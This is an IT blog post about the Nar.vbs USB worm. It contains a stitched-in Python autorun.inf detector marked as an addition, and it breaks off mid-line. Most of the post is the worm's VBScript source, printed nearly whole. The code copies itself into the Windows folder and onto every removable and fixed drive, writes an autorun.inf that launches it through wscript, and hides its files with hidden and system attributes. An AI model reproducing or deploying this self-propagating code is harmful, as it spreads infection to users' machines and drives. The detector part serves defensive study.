
IT Journal of Steve Kline

A little about me, what I do, and what I know

Nar.VBS and Autorun.inf

I am plenty sure that someone has run into this ugly little punk somewhere around the world... Originally I discovered it on my hard drive when I was copying some data from a colleague's flash drive. I wasn't sure what it was or where it came from. I had issues with a DVD not loading; without thinking, I checked the registry. Autorun seemed to be funky because nothing would ever come up. My colleague had the same issues. I enabled my anti-virus wondering if something would catch; sure enough, this NAR.VBS file came back registered as a worm. It popped up out of multiple locations on the hard disk. I asked for the flash drive my friend had given to me before and noticed that Nar.vbs had come off of his flash drive. It went to all of my flash drives as well.

The autorun file had a line of script in it.

Autorun.INF

shellexecute=wscript nar.vbs
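
A defender-side check for the kind of entry shown above, as an added example that is not part of the original post: it parses autorun.inf text and flags run keys in [autorun] that start a Windows script host or a script file. The function name, the host and extension lists, and both sample files are assumptions constructed for illustration.

```python
import re

# Script hosts and script extensions that a legitimate autorun.inf rarely launches
# (assumed lists for this example; extend them to fit your environment).
SCRIPT_HOSTS = {"wscript", "wscript.exe", "cscript", "cscript.exe"}
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh")
# Keys in the [autorun] section that cause a command to be executed.
EXEC_KEY = re.compile(r"^(open|shellexecute|shell\\[^\\=]+\\command)$", re.I)

# Constructed samples: the first mirrors the autorun text built by the script on this page.
WORM_STYLE = "[autorun]\r\nshellexecute=wscript.exe nar.vbs\r\n"
BENIGN = "[autorun]\r\nopen=setup.exe\r\nicon=setup.exe,0\r\n"


def suspicious_autorun_entries(text):
    """Return (key, command) pairs in [autorun] that start a script host or script file."""
    hits = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue  # blank line or comment
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "autorun" or "=" not in line:
            continue
        key, _, value = line.partition("=")
        key, value = key.strip(), value.strip()
        if not EXEC_KEY.match(key):
            continue  # icon=, label= and similar keys do not run anything
        # Compare only the file-name part of each token, case-insensitively.
        tokens = value.replace('"', " ").split()
        names = [t.lower().rsplit("\\", 1)[-1] for t in tokens]
        if any(n in SCRIPT_HOSTS or n.endswith(SCRIPT_EXTS) for n in names):
            hits.append((key.lower(), value))
    return hits


if __name__ == "__main__":
    for label, sample in (("worm-style", WORM_STYLE), ("benign", BENIGN)):
        print(label, suspicious_autorun_entries(sample))
```

To use it on a real drive, read the autorun.inf at the drive root as text and pass the contents to the function; any returned pair is worth a look before the drive is trusted.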

That's pretty funky. I know VB, let's see what this bad boy has written...

Nar.VBS

'v0.1

on error resume next

dim narsource,nar_RunDir,windir,disk_Drive,fso,mf,autorun,to_File,text,shell,in_WinDir,wsh_Path

set fso = CreateObject("Scripting.FileSystemObject")
set shell = CreateObject("Wscript.shell")
set mf = fso.GetFile(Wscript.ScriptFullname)
nar_RunDir = fso.GetParentFolderName(mf)
Set windir = fso.getspecialfolder(0)
in_WinDir = 2
wsh_Path = fso.GetFile(Wscript.Fullname)

If (fso.FileExists(Windir & "\nar.vbs") = 0 or in_WinDir = 1) then
set to_File = fso.getfile(windir & "\nar.vbs")
to_File.attributes = 32
Kill (windir & "\nar.vbs")
End If
If (fso.FileExists("C:\Windows\System\nar.vbs") = 0) then
set to_File = fso.getfile("C:\Windows\System\nar.vbs")
to_File.attributes = 32
Kill ("C:\Windows\System\nar.vbs")
End If
If (fso.FileExists("C:\nar.vbs") = 0) then
set to_File = fso.getfile("C:\nar.vbs")
to_File.attributes = 32
Kill ("C:\nar.vbs")
End If

If (fso.GetAbsolutePathName(windir) <> fso.GetAbsolutePathName(nar_RunDir)) Then
shell.run(windir & "\explorer.exe /root," & nar_RunDir)
in_WinDir = 0
Else
in_WinDir = 1
End If

If (fso.FileExists(windir & "\nar.vbs") = 0 or in_WinDir = 1) Then

autorun = "[autorun]"&vbcrlf&"shellexecute=wscript.exe nar.vbs"
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
narsource=narsource & text.readline
narsource=narsource & vbcrlf
loop


If (in_WinDir = 0) Then
set to_File = fso.getfile(windir & "\Nar.vbs")
to_File.attributes = 32
set to_File=fso.createtextfile(windir & "\Nar.vbs",2,true)
to_File.write narsource
to_File.close
set to_File = fso.getfile(windir & "\Nar.vbs")
to_File.attributes = 39
End If

do while (in_WinDir = 1)
for each disk_Drive in fso.drives
If (disk_Drive.drivetype = 1 or disk_Drive.drivetype = 2) Then

set to_File=fso.GetFile(disk_Drive.path & "\nar.vbs")
to_File.attributes = 32
set to_File=fso.CreateTextFile(disk_Drive.path & "\nar.vbs",2,true)
to_File.write narsource
to_File.close
set to_File=fso.GetFile(disk_Drive.path & "\nar.vbs")
to_File.attributes = 39

set to_File=fso.GetFile(disk_Drive.path & "\Autorun.inf")
to_File.attributes = 32
set to_File=fso.CreateTextFile(disk_Drive.path & "\Autorun.inf",2,true)
to_File.write autorun
to_File.close
set to_File=fso.GetFile(disk_Drive.path & &q